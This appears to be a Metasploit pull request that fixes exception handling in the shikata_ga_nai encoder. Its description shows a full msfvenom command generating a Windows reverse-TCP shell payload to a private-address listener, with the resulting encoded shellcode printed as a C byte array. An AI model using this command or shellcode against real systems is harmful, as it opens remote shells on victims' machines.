### PR TITLE
Fix #5596 by catching RuntimeError from Rex::Poly

### DIFF
--- a/modules/encoders/x86/shikata_ga_nai.rb
+++ b/modules/encoders/x86/shikata_ga_nai.rb
@@ -281,8 +281,9 @@ protected
     begin
       # Generate a permutation saving the ECX, ESP, and user defined registers
       loop_inst.generate(block_generator_register_blacklist, nil, state.badchars)
-    rescue EncodingError => e
-      raise EncodingError
+    rescue RuntimeError, EncodingError => e
+      # The Rex::Poly block generator can raise RuntimeError variants
+      raise EncodingError, e.to_s
     end
   end
 


### PR DESCRIPTION
Successful encoding fallthrough after the fix:

```
$ ./msfvenom -p windows/shell/reverse_tcp LHOST=192.168.99.1 LPORT=4545 -b '\xd9' -f c -a x86
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with An encoding exception occurred.
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 324 (iteration=0)
x86/call4_dword_xor chosen with final size 324
Payload size: 324 bytes
unsigned char buf[] = 
"\x2b\xc9\x83\xe9\xb5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x0d\x30\x2e\x29\x83\xee\xfc\xe2\xf4\xf1\xd8\xac\x29\x0d\x30"
"\x4e\xa0\xe8\x01\xee\x4d\x86\x60\x1e\xa2\x5f\x3c\xa5\x7b\x19"
"\xbb\x5c\x01\x02\x87\x64\x0f\x3c\xcf\x82\x15\x6c\x4c\x2c\x05"
"\x2d\xf1\xe1\x24\x0c\xf7\xcc\xdb\x5f\x67\xa5\x7b\x1d\xbb\x64"
"\x15\x86\x7c\x3f\x51\xee\x78\x2f\xf8\x5c\xbb\x77\x09\x0c\xe3"
"\xa5\x60\x15\xd3\x14\x60\x86\x04\xa5\x28\xdb\x01\xd1\x85\xcc"
"\xff\x23\x28\xca\x08\xce\x5c\xfb\x33\x53\xd1\x36\x4d\x0a\x5c"
"\xe9\x68\xa5\x71\x29\x31\xfd\x4f\x86\x3c\x65\xa2\x55\x2c\x2f"
"\xfa\x86\x34\xa5\x28\xdd\xb9\x6a\x0d\x29\x6b\x75\x48\x54\x6a"
"\x7f\xd6\xed\x6f\x71\x73\x86\x22\xc5\xa4\x50\x58\x1d\x1b\x0d"
"\x30\x46\x5e\x7e\x02\x71\x7d\x65\x7c\x59\x0f\x0a\xcf\xfb\x91"
"\x9d\x31\x2e\x29\x24\xf4\x7a\x79\x65\x19\xae\x42\x0d\xcf\xfb"
"\x79\x5d\x60\x7e\x69\x5d\x70\x7e\x41\xe7\x3f\xf1\xc9\xf2\xe5"
"\xb9\x43\x08\x58\xee\x81\x6e\x31\x46\x2b\x0d\x21\xef\xa0\xeb"
"\x5a\x3e\x7f\x5a\x58\xb7\x8c\x79\x51\xd1\xfc\x88\xf0\x5a\x23"
"\xf2\x7e\x26\x5c\xe1\xd8\x11\x29\x0d\x30\x44\x29\x67\x34\x78"
"\x7e\x65\x32\xf7\xe1\x52\xcf\xfb\xaa\xf5\x30\x50\xc0\x86\x06"
"\x44\x69\x65\x30\x3e\x29\x0d\x66\x44\x29\x65\x68\x8a\x7a\xe8"
"\xcf\xfb\xba\x5e\x5a\x2e\x7f\x5e\x67\x46\x2b\xd4\xf8\x71\xd6"
"\xd8\xb3\xd6\x29\x73\xf3\x2f\xea\x24\xf6\x5b\xc0\xce\x8b\xde"
"\x9c\xaf\x66\x44\x29\x5e\xcf\xfb\x29";
```
